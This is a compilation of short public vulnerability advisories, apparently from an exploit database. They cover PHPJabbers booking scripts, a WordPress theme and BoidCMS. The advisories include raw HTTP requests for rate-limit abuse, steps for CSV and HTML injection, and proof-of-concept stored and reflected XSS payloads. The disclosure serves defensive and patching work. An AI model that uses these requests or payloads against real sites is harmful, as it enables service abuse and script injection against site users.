<pre><code># Exploit Title: PHPJabbers Car Rental v3.0 - No Rate Limit in Email<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-rental-script/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48834<br /><br />Descriptions:<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Request Data:<br /><br />POST /1701528105_124/index.php?controller=pjBaseOptions&action=pjActionAjaxSend<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 502<br />Origin: https://demo.phpjabbers.com<br />Referer: https://demo.phpjabbers.com/1701528105_124/index.php?controller=pjBaseOptions&action=pjActionEmailSettings&err=PBS03<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test<br /><br />2. Send it to intruder and configure then attack.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48834)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - No Rate<br />Limit in Email<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48833<br /><br />Descriptions:<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Request Data:<br /><br />POST /1701527883_624/index.php?controller=pjBaseOptions&action=pjActionAjaxSend<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 502<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test<br /><br />2. Send it to intruder and configure then attack.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48833)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - No<br />Rate Limit in Email<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo<br /># Version: v5.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48831<br /><br />Descriptions:<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Request Data:<br /><br />POST /1701526313_862/index.php?controller=pjBaseOptions&action=pjActionAjaxSend<br />HTTP/1.1<br />Host: localhost<br />Cookie: _ga=GA1.2.1947184974.1699512498;<br />_fbp=fb.1.1699512498084.844079488;<br />_ga_NME5VTTGTT=GS1.2.1701527599.5.1.1701527608.51.0.0;<br />_gcl_au=1.1.1109346785.1700383352;<br />_hjSessionUser_2841064=eyJpZCI6ImVlNjRmZTlkLTlmMDAtNWJmMC05OTk1LWE4ODQzMmNiMGQ0OSIsImNyZWF0ZWQiOjE3MDAzODMzNTQyMDYsImV4aXN0aW5nIjp0cnVlfQ==;<br />pj_sid=PJ1.0.3350592650.1700383356; pj_so=PJ1.0.9822262006.1700383356;<br />CarRental=pb6krbqhp0ugdgduc39iagulp2; pjd=fmfk4mh95jvo519v16tcbmfte4;<br />PHPSESSID=91h58pp95vek8qpp4jj62srb23;<br />ShuttleBooking=uhei7cs26l7eoen1bfja4ciaq2;<br />TSBCalendar=k2502gveirj5nhpo9ofnbpnrv2;<br />ABCalendar=lkoj2qi9cq5dib87qothkc9d77;<br />_gid=GA1.2.1184409840.1701527598; _gat=1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 502<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test<br /><br />2. Send it to intruder and configure then attack.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48831)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Shuttle Booking Software v2.0 - CSV Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/shuttle-booking-software/<br /># Version: v2.0<br /># Tested on: Windows 10, Windows 11, MS Office 2010<br /># CVE-2023-48830<br /><br />Descriptions:<br />PHPJabbers Shuttle Booking Software v2.0 is vulnerable to CSV<br />injection vulnerability which allows an attacker to execute remote<br />code. The vulnerability exists due to insufficient input validation on<br />the Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language Section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48830)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 -<br />Multiple Stored XSS<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48828<br /><br />Descriptions:<br />Multiple Stored Cross-Site Scripting (XSS) is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into the content that is<br />permanently stored on the server. Unlike reflected XSS, where the<br />malicious script is embedded in a URL and executed immediately, stored<br />XSS involves the persistent storage of the malicious script on the<br />target server, waiting for unsuspecting users to access the<br />compromised content.<br /><br />Steps to Reproduce:<br />1. Login your panel<br />2. Vulnerable parameters are "name, plugin_sms_api_key,<br />plugin_sms_country_code, calendar_id, title, country name,<br />customer_name".<br />3. Go to System Menu then click SMS Settings.<br />4. Then use any XSS Payload in "SMS API Key", "Default Country Code"<br />input field and Save.<br />5. You will see popup.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48828)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - HTML Injection<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48827<br /><br />Descriptions:<br />HTML injection, also known as HTML code injection or cross-site<br />scripting (XSS), is a web security vulnerability that allows an<br />attacker to inject malicious code into a web page that is then viewed<br />by other users. This can lead to various attacks, such as stealing<br />sensitive information, session hijacking, defacement of websites, or<br />delivering malware to users.<br /><br />Steps to Reproduce:<br />1. Login your panel<br />2. "name, plugin_sms_api_key, plugin_sms_country_code, calendar_id,<br />title, country name, customer_name" parameters are vulnerable to html<br />injection.<br />3. Go to System Menu then click SMS Settings.<br />4. Then use any HTML Tag in "SMS API Key", "Default Country Code"<br />input field and Save.<br />5. You will see HTML code working here.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48827)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - CSV Injection<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48826<br /><br />Descriptions:<br />PHPJabbers Time Slots Booking Calendar v4.0 is vulnerable to CSV<br />injection vulnerability which allows an attacker to execute remote<br />code. The vulnerability exists due to insufficient input validation on<br />the Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to System Menu then click Language and go to Labels.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48826)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo<br /># Version: v5.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48825<br /><br />Descriptions:<br />HTML injection, also known as HTML code injection or cross-site<br />scripting (XSS), is a web security vulnerability that allows an<br />attacker to inject malicious code into a web page that is then viewed<br />by other users. This can lead to various attacks, such as stealing<br />sensitive information, session hijacking, defacement of websites, or<br />delivering malware to users.<br /><br />Steps to Reproduce:<br />1. Login your panel<br />2. Go to System Menu then click SMS Settings.<br />3. Then use any HTML Tag in "SMS API Key", "Default Country Code"<br />input field and Save.<br />4. You will see HTML code working here.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48825)<br /></code></pre>
<pre><code># Exploit Title: WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting (XSS)<br /># Date: 3/12/2023 <br /># Exploit Author: Haktrak Team<br /># Vendor Homepage: https://phlox.pro<br /># Software Link: https://www.phlox.pro/go/<br /># Version: 5.14.0<br /># Tested on: Linux[apache]/wordrepss 6.3.1<br /><br /><br />Description:<br /><br />A Cross Site Scripting (XSS) vulnerability exists in WordPress Theme phlox-pro<br /><br />Vulnerable Code:<br /><br /><br /><form method="get" id="searchform" class="searchform" action="<?php echo esc_url( home_url( '/' ) ); ?>"><br /><br /> <input type="text" class="field" name="s" id="s" placeholder="<?php esc_attr_e( 'Search Here', 'phlox-pro'); ?>" value="<?php the_search_query(); ?>" /><br /> <br /><br /><br /><br /><br />Steps to exploit:<br />1) Go to searchform<br />2) Insert your payload in the "search"<br /><br />Proof of concept (Poc):<br />The following payload will allow you to run the javascript -<br />https://example.com/?s=ok&%27><script>alert(%27XSS%27)</script>123=1<br /></code></pre>
<pre><code># Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://boidcms.github.io/#/<br /># Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip<br /># Version: v2.0.1<br /># Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56<br /># CVE: CVE-2023-48824<br /><br />Descriptions:<br />BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting<br />(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,<br />keywords" parameters of&nbsp;settings, create page.<br /><br /><br />Steps to Reproduce:<br /><br />1. Request:<br /><br />POST /BoidCMS/admin?page=create HTTP/1.1<br />Host: 192.168.1.74<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data;<br />boundary=---------------------------9882691211259772119227456445<br />Content-Length: 1492<br />Origin: http://192.168.1.74<br />Connection: close<br />Referer: http://192.168.1.74/BoidCMS/admin?page=create<br />Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;<br />KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;<br />KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="type"<br /><br />post<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="title"<br /><br />test<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="descr"<br /><br />test<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="keywords"<br /><br />test<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="content"<br /><br />test<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="permalink"<br /><br /><br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="tpl"<br /><br />theme.php<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="thumb"<br /><br /><br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="date"<br /><br />2023-12-02T19:41<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="pub"<br /><br />true<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="token"<br /><br />83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="create"<br /><br />Create<br />-----------------------------9882691211259772119227456445--<br /><br /><br />2. Now use xss payload "><img src=x onerror=alert(1)> on "title,<br />subtitle, footer, keywords" parameters.<br />3. Save and check home.<br /><br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)<br /></code></pre>
